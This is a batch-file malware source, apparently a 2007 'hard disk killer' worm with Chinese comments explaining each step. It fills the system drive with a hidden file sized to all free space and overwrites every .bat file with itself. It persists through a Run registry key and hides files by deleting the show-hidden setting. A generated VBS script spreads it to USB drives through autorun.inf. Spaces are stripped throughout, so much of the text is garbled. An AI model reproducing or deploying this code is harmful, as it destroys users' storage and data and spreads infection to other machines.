超级硬盘杀手的bat

@echooff

%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone%%Name:REON%%ozone%
%ozone%%Author:Ozone[verybat.cn]%%ozone%
%ozone%%Data:17/04/2007%%ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%



ifexsit%SystemDrive%\PAGEFILES.SYSgotoend
copy%0%windir%\system32\logon.bat::复制自身
FOR/F"tokens=3*"%%iin(''dir/-c%SystemDrive%^|find"可用字节"'')dofsutilfilecreatenew%SystemDrive%\PAGEFILES.SYS%%i::制造超大文件,轰炸硬盘
attrib+r+s+h%SystemDrive%\PAGEFILES.SYS::隐藏文件
regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vKV2007/tREG_SZ/d%windir%\system32\logon.vbs::自动启动
regdeleteHKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL/va/f::不显示隐藏文件
for/r%SystemDrive%%%iin(*.bat)dotype%0>%%i::感染


ifexist%windir%\system32\logon.vbsgotoend
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++

echosetfs=createobject("scripting.filesystemobject")>>%windir%\system32\logon.vbs
echosetWshShell=WScript.CreateObject("WScript.Shell")>>%windir%\system32\logon.vbs
echoSetobjWMIService=GetObject("winmgmts:"_>>%windir%\system32\logon.vbs
echo^&"{impersonationLevel=impersonate}!\\"^&strComputer^&"\root\cimv2")>>%windir%\system32\logon.vbs
echoSetcolDisks=objWMIService.ExecQuery_>>%windir%\system32\logon.vbs
echo("Select*fromWin32_LogicalDisk")>>%windir%\system32\logon.vbs

::监视u盘
echoFori=1to9000000000>>%windir%\system32\logon.vbs
echoForEachobjDiskincolDisks>>%windir%\system32\logon.vbs
echoSelectCaseobjDisk.DriveType>>%windir%\system32\logon.vbs
echo:Case2:>>%windir%\system32\logon.vbs


::判断u盘中是否存在autorun.inf,不存在则写入autorun.inf并且隐藏.
echoy1=fs.FileExists(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echoifnoty1then>>%windir%\system32\logon.vbs
echosetf=fs.opentextfile(objDisk.DeviceID^&"\AUTORUN.INF",2,true)>>%windir%\system32\logon.vbs
echof.write"[AutoRun]"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"open=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"shellexecute=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.write"shell\Auto\command=logon.bat"^&vbcrlf>>%windir%\system32\logon.vbs
echof.Close>>%windir%\system32\logon.vbs
echoSetf1=fs.GetFile(objDisk.DeviceID^&"\AUTORUN.INF")>>%windir%\system32\logon.vbs
echoIff1.Attributes=f1.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f1.Attributes=f1.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs

::判断u盘中是否存在logon.bat,如果不存在则写入logon.bat并隐藏.
echoy2=fs.FileExists(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs
echoifnoty2then>>%windir%\system32\logon.vbs
echofs.CopyFile"c:\windows\system32\logon.bat",objDisk.DeviceID^&"\">>%windir%\system32\logon.vbs
echoSetf2=fs.GetFile(objDisk.DeviceID^&"\logon.bat")>>%windir%\system32\logon.vbs
echoIff2.Attributes=f2.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f2.Attributes=f2.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs

echodirr=Wshshell.ExpandEnvironmentStrings("%systemdrive%")>>%windir%\system32\logon.vbs

::判断u盘中是否存在PAGEFILES.SYS,如果不存在则写入PAGEFILES.SYS并隐藏.
echoy3=fs.FileExists(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echoifnoty3then>>%windir%\system32\logon.vbs
echoWshShell.Run"logon.bat">>%windir%\system32\logon.vbs
echoWScript.Sleep500>>%windir%\system32\logon.vbs
echoSetf3=fs.GetFile(dirr&"\PAGEFILES.SYS")>>%windir%\system32\logon.vbs
echoIff3.Attributes=f3.AttributesAND2Then>>%windir%\system32\logon.vbs
echo:f3.Attributes=f3.AttributesXOR7:>>%windir%\system32\logon.vbs
echoEndIf>>%windir%\system32\logon.vbs
echoendif>>%windir%\system32\logon.vbs
echoEndSelect>>%windir%\system32\logon.vbs
echoNext>>%windir%\system32\logon.vbs

::每隔5秒扫描一次.
echoWScript.Sleep5000>>%windir%\system32\logon.vbs
echoNext>>%windir%\system32\logon.vbs

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

:end